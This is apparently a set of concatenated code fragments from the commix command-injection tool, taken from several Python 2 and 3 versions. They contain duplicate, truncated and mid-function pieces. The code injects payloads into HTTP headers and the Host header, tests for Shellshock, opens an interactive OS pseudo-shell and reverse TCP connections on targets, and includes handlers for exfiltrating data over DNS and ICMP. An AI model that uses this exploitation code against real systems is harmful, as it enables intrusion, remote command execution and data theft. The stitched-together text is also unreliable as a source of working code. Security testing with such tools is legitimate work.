' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: proxy = _urllib.request.ProxyHandler({settings.SCHEME:settings.PRIVOXY_IP + ":" + settings.PRIVOXY_PORT}) response = inject_custom_header(url, vuln_parameter, payload, proxy) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() else: try: response = inject_custom_header(url, vuln_parameter, payload, proxy) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print("") if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() if settings.TIME_RELATIVE_ATTACK : end = time.time() how_long = int(end - start) return how_long else: return response
def custom_header_injection(url, vuln_parameter, payload): def inject_custom_header(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) payload = urllib.unquote(payload) # Fix for %0a, %0d%0a separators if payload[:1] == "\n": payload = urllib.quote(payload[:1]) + payload[1:] elif payload[:2] == "\r\n": payload = urllib.quote(payload[:2]) + payload[2:] request.add_header(settings.CUSTOM_HEADER_NAME, payload) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass if settings.TIME_RELATIVE_ATTACK : start = 0 end = 0 start = time.time() proxy = None #response = inject_custom_header(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy}) response = inject_custom_header(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
def host_injection(url, vuln_parameter, payload): payload = urlparse.urlparse(url).hostname + payload def inject_host(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) # Check if defined POST data if menu.options.data: menu.options.data = settings.USER_DEFINED_POST_DATA request = urllib2.Request(url, menu.options.data) else: url = parameters.get_url_part(url) request = urllib2.Request(url) #Check if defined extra headers. headers.do_check(request) payload = checks.newline_fixation(payload) request.add_header('Host', payload) try: headers.check_http_traffic(request) response = opener.open(request) return response except ValueError: pass if settings.TIME_RELATIVE_ATTACK : start = 0 end = 0 start = time.time() proxy = None #response = inject_host(url, vuln_parameter, payload, proxy) # Check if defined any HTTP Proxy. if menu.options.proxy: try: proxy = urllib2.ProxyHandler({settings.SCHEME : menu.options.proxy}) response = inject_host(url, vuln_parameter, payload, proxy) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" sys.stdout.write("(*) Testing the " + technique + "... ") sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) header = {check_header: payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.update_payload(filename, counter, payload) if cve in response.info(): no_result = False print Style.BRIGHT + "\n(!) The (" + check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title( ) + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL if not menu.options.verbose: print "" # Enumeration options. if settings.ENUMERATION_DONE == True: if menu.options.verbose: print "" while True: enumerate_again = raw_input( "(?) Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( "(?) Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOISE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: if menu.options.verbose: print "" gotshell = raw_input( "(?) Do you want a Pseudo-Terminal? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp( ) while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( lhost) else: cmd = reverse_tcp.reverse_tcp_options( lhost, lport) result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True break # Command execution results. shell = cmd_exec( url, cmd, cve, check_header, filename) if menu.options.verbose: print "" print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL else: pass else: shell = cmd_exec( url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise except SystemExit: raise except: print "" sys.exit(0) elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL continue break else: continue except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + ". " if settings.VERBOSITY_LEVEL >= 2: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL >= 2: debug_msg = "Generating payload for the injection." print(settings.print_debug_msg(debug_msg)) print(settings.print_payload(payload)) header = {check_header : payload} request = _urllib.request.Request(url, None, header) if check_header == "User-Agent": menu.options.agent = payload else: menu.options.agent = default_user_agent log_http_headers.do_check(request) log_http_headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor. elif menu.options.tor: response = tor.use_tor(request) else: response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT) percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: percent = settings.FAIL_STATUS else: percent = settings.info_msg no_result = False elif len(response.info()) > 0 and cve in response.info(): percent = settings.info_msg no_result = False else: percent = str(float_percent)+ "%" if settings.VERBOSITY_LEVEL == 0: info_msg = "Testing the " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) if settings.VERBOSITY_LEVEL != 0: if settings.VERBOSITY_LEVEL == 1: print(settings.SINGLE_WHITESPACE) checks.total_of_requests() info_msg = "The (" + check_header + ") '" info_msg += url + Style.RESET_ALL + Style.BRIGHT info_msg += "' seems vulnerable via " + technique + "." if settings.VERBOSITY_LEVEL == 0: print(settings.SINGLE_WHITESPACE) print(settings.print_bold_info_msg(info_msg)) sub_content = "\"" + payload + "\"" print(settings.print_sub_content(sub_content)) # Enumeration options. if settings.ENUMERATION_DONE == True : if settings.VERBOSITY_LEVEL != 0: print(settings.SINGLE_WHITESPACE) while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = _input(settings.print_question_msg(question_msg)) else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "Y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " file_access_again = _input(settings.print_question_msg(question_msg)) else: file_access_again= "" if len(file_access_again) == 0: file_access_again = "Y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print("\n") + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL raise SystemExit() else: # Pseudo-Terminal shell print(settings.SINGLE_WHITESPACE) go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " gotshell = _input(settings.print_question_msg(question_msg)) else: gotshell= "" if len(gotshell) == 0: gotshell= "Y" if gotshell in settings.CHOICE_YES: # if not menu.options.batch: # print(settings.SINGLE_WHITESPACE) print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)") if settings.READLINE_ERROR: checks.no_readline_module() while True: try: if not settings.READLINE_ERROR: checks.tab_autocompleter() sys.stdout.write(settings.OS_SHELL) cmd = _input() cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n") else: debug_msg = "Executing the '" + cmd + "' command. " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") elif settings.VERBOSITY_LEVEL >= 2: sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") err_msg = "The '" + cmd + "' command, does not return any output." print(settings.print_critical_msg(err_msg) + "\n") except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) raise except TypeError: break elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print(settings.print_error_msg(err_msg)) continue break else: continue if no_result: if settings.VERBOSITY_LEVEL != 2: print(settings.SINGLE_WHITESPACE) err_msg = "All tested HTTP headers appear to be not injectable." print(settings.print_critical_msg(err_msg)) raise SystemExit() except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(err_msg.code) == settings.BAD_REQUEST: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n" + settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL != 0 and settings.LOAD_SESSION == False: print(settings.SINGLE_WHITESPACE) print(settings.print_critical_msg(err_msg)) raise SystemExit() except _http_client.IncompleteRead as err_msg: print(settings.print_critical_msg(err_msg + ".")) raise SystemExit()
response = False except urllib2.URLError, err: if "Connection refused" in err.reason: err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print "\n" + settings.print_critical_msg(err_msg) raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print settings.print_error_msg(err) continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: err_msg = "The target host is not responding." err_msg += " Please ensure that is up and try again." print "\n" + settings.print_critical_msg(err_msg) raise SystemExit() else: try: response = urllib2.urlopen(request)
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print "\n" + settings.print_info_msg(info_msg) print settings.print_payload(payload) header = {check_header: payload} request = urllib2.Request(url, None, header) log_http_headers.check_http_traffic(request) response = urllib2.urlopen(request) percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len(response.info()) > 0 and cve in response.info(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False elif len(response.read()) > 0 and cve in response.read(): percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL no_result = False else: percent = str(float_percent) + "%" if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) #if vp_flag == True: vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) success_msg = "The (" + check_header + ") '" success_msg += url + Style.RESET_ALL + Style.BRIGHT success_msg += "' seems vulnerable via " + technique + "." print "\n" + settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL if not settings.VERBOSITY_LEVEL >= 1: print "" # Enumeration options. if settings.ENUMERATION_DONE == True: if settings.VERBOSITY_LEVEL >= 1: print "" while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) enumerate_again = sys.stdin.readline().replace( "\n", "").lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True: while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline( ).replace("\n", "").lower() else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: if settings.VERBOSITY_LEVEL >= 1: print "" if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace( "\n", "").lower() else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options( url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec( url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command( filename, cmd, shell) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: info_msg = "Executing the '" + cmd + "' command... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write( "\n" + settings. print_info_msg( info_msg)) elif settings.VERBOSITY_LEVEL > 1: sys.stdout.write( settings. print_info_msg( info_msg)) sys.stdout.flush() sys.stdout.write( "\n" + settings.print_payload( payload) + "\n") #print "\n" + settings.print_payload(payload) err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg( err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except: print "" sys.exit(0) elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) continue break else: continue if no_result: print "" except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit()
if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) else: try: response = urllib2.urlopen(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print "\n" + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg)
def dns_exfiltration_handler(url, http_request_method): # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # You need to have root privileges to run this script if os.geteuid() != 0: err_msg = "You need to have root privileges to run this option." print("\n" + settings.print_critical_msg(err_msg)) os._exit(0) if http_request_method == "GET": #url = parameters.do_GET_check(url) vuln_parameter = parameters.vuln_GET_param(url) request = _urllib.request.Request(url) headers.do_check(request) else: parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) parameter = parameters.do_POST_check(parameter) request = _urllib.request.Request(url, parameter) headers.do_check(request) vuln_parameter = parameters.vuln_POST_param(parameter, url) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n") + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n") + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) else: try: response = _urllib.request.urlopen(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n") + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) if settings.TARGET_OS == "win": err_msg = "This module's payloads are not suppoted by " err_msg += "the identified target operating system." print(settings.print_critical_msg(err_msg) + "\n") os._exit(0) else: dns_server = menu.options.dns_server technique = "DNS exfiltration module" info_msg = "Loading the " + technique + ". \n" sys.stdout.write(settings.print_info_msg(info_msg)) exploitation(dns_server, url, http_request_method, vuln_parameter, technique)
def icmp_exfiltration_handler(url, http_request_method): # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # You need to have administrative privileges to run this module. if not common.running_as_admin(): err_msg = "You need to have administrative privileges to run this module." print(settings.print_critical_msg(err_msg) + "\n") os._exit(0) if http_request_method != settings.HTTPMETHOD.POST: #url = parameters.do_GET_check(url, http_request_method) request = _urllib.request.Request(url) headers.do_check(request) vuln_parameter = parameters.vuln_GET_param(url) else: parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) parameter = parameters.do_POST_check(parameter, http_request_method) request = _urllib.request.Request(url, parameter) headers.do_check(request) vuln_parameter = parameters.vuln_POST_param(parameter, url) # Check if defined any HTTP Proxy. if menu.options.proxy: try: response = proxy.use_proxy(request) except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str( err_msg.code) == settings.BAD_REQUEST: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n" + settings.print_critical_msg(err)) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: os._exit(0) # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except _urllib.error.HTTPError as err_msg: if 